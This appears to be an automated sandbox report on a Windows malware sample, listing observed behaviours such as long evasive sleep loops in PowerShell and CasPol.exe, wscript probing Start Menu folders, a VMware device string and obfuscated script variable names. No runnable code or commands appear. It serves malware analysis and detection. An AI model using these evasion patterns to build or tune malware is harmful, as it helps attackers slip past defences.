Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2086
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7091
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2620
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1056
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8189
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1433
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1446
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6419
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3266
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 943
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2006
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 432
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 745
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3916
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 651
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 519
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7223
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 521
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 739
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5266
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 961
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6116
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2873
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 565
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6717
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 498
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4455
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3436
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 835
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5050
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4713
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2143
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 694
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 4912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 4880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 824
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9141
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 619
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9355
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 401
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 488
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 515
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9437
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9349
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6492 Thread sleep count: 7091 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3200 Thread sleep count: 2620 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3528 Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5864 Thread sleep count: 1056 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984 Thread sleep count: 133 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5408 Thread sleep count: 8189 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5320 Thread sleep count: 1433 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5048 Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6812 Thread sleep count: 1446 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4912 Thread sleep count: 137 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5364 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8248 Thread sleep count: 6419 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368 Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8248 Thread sleep count: 3266 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868 Thread sleep count: 943 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8296 Thread sleep count: 103 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4952 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8372 Thread sleep count: 2006 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8392 Thread sleep count: 237 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8336 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8376 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8772 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8760 Thread sleep count: 745 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9004 Thread sleep count: 3916 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8828 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9004 Thread sleep count: 103 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8736 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9036 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716 Thread sleep count: 651 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9168 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8588 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5356 Thread sleep count: 424 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3144 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536 Thread sleep count: 7223 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4444 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5460 Thread sleep count: 521 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 824 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5688 Thread sleep count: 739 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7264 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8804 Thread sleep count: 5266 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8844 Thread sleep count: 125 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5848 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8860 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036 Thread sleep count: 961 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8980 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8224 Thread sleep count: 6116 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5512 Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1952 Thread sleep count: 2873 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8784 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3092 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6816 Thread sleep count: 565 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308 Thread sleep count: 262 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1724 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912 Thread sleep count: 6717 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824 Thread sleep count: 3003 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4448 Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 636 Thread sleep count: 498 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1852 Thread sleep count: 259 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2740 Thread sleep count: 4455 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4780 Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2740 Thread sleep count: 3436 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8988 Thread sleep count: 1000 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1976 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984 Thread sleep count: 835 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1304 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1996 Thread sleep count: 5050 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1972 Thread sleep count: 4713 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692 Thread sleep count: 34 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692 Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2544 Thread sleep count: 2143 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3252 Thread sleep count: 694 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6212 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 64 Thread sleep count: 39 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 64 Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3784 Thread sleep count: 4912 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3784 Thread sleep count: 4880 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824 Thread sleep count: 824 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 980 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4456 Thread sleep count: 9141 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796 Thread sleep count: 619 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4256 Thread sleep count: 31 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4256 Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8620 Thread sleep count: 700 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772 Thread sleep count: 112 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460 Thread sleep count: 9355 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8508 Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808 Thread sleep count: 401 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1084 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8396 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396 Thread sleep count: 488 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4060 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8428 Thread sleep count: 515 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6084 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5928 Thread sleep count: 9437 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676 Thread sleep count: 235 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 Thread sleep count: 9349 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9132 Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 Thread sleep count: 255 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4064 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5352 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B09F70 CloseHandle,FindFirstFileW,FindClose, 0_2_00007FF681B09F70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: wscript.exe, 00000041.00000003.1692282992.0000020187A4D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000015.00000003.1552801034.0000022A5F3AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iBWLquWiWlbWgKOfecWOdloLZzNWpcOlhbkijLiJLqkAikGsmiRicrhgfsuAWGGiPzqG = "UWopUZi
Source: wscript.exe, 00000015.00000003.1552801034.0000022A5F3AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: zxhzGqpqpKioHCAGvLkBWPULbshcnpKqothGlzRlWUtcnhArizcTULzbuuLearpSWUpdsmiRicrhgfs
Source: wscript.exe, 0000001B.00000003.1573411569.000002159CF0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iBWLquWiWlbWgKOfecWOdloLZzNWpcOlhbkijLiJLqkAikGsmiRicrhgfsuAWGGiPzqGBzZKkLugQho
Source: wscript.exe, 0000000F.00000003.1526614342.0000023FDC4BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.1522043070.0000023FDC4BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.1523124446.0000023FDC4BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.1523425436.0000023FDC4BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.1522805277.0000023FDC4BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000003.1549681901.0000022A5F22A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000003.1547703870.0000022A5F22A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000003.1555430431.0000022A5F22C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000003.1550005796.0000022A5F22A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000003.1548715389.0000022A5F22A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.1574574044.000002159CD8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iBWLquWiWlbWgKOfecWOdloLZzNWpcOlhbkijLiJLqkAikGsmiRicrhgfsuAWGGiPzqG
